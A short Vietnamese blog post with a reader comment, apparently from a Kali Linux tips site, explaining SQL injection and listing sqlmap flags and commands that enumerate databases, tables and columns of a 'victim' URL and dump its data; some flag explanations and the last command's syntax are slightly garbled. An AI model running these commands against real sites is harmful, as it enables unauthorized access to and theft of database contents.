Lỗ hổng SQL Injection khá cơ bản và cũng rất nguy hiểm với các webmaster. Do sự thiếu cẩn trọng trong lúc lập trình hoặc không thể kiểm soát và fillter được hết các form để từ đó các script kiddies tận dụng inject vào thực thi query/command mà không cần login username/password để remote excute, dump data, lấy root sqlsever

Các lệnh cơ bản
-u = đường dẫn url
–dbs = Liệt kế databases
-D = ( DBMS ) Database Management System ” Hệ thống quản lý cơ sở dữ liệu”
-T = tables
-C = columns
–dump = Xuất dữ liệu
# sqlmap -u victim –dbs
# sqlmap -u victim -D Tài khoản –tables
# sqlmap -u victim -D Tài khoản -T Info –columns
# sqlmap -u victim -D Tài khoản -T Info -C Info columns a,b,c –dump

#KaliLinux
#sqlmap
#SQLInjection
#Thekalitips

source: https://sebastienizambard.net/

Xem thêm các bài viết về Kinh Doanh: https://sebastienizambard.net/category/kinh-doanh/

2 thoughts on “Sử dụng Sqlmap khai thác lỗ hỏng SQL Injection”

  • The Kali Tips says:

    Các lệnh cơ bản

    -u = đường dẫn url

    –dbs = Liệt kế databases

    -D = ( DBMS ) Database Management System " Hệ thống quản lý cơ sở dữ liệu"

    -T = tables

    -C = columns

    –dump = Xuất dữ liệu

    # sqlmap -u victim –dbs

    # sqlmap -u victim -D Tài khoản –tables

    # sqlmap -u victim -D Tài khoản -T Info –columns

    # sqlmap -u victim -D Tài khoản -T Info -C Info columns a,b,c –dump

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>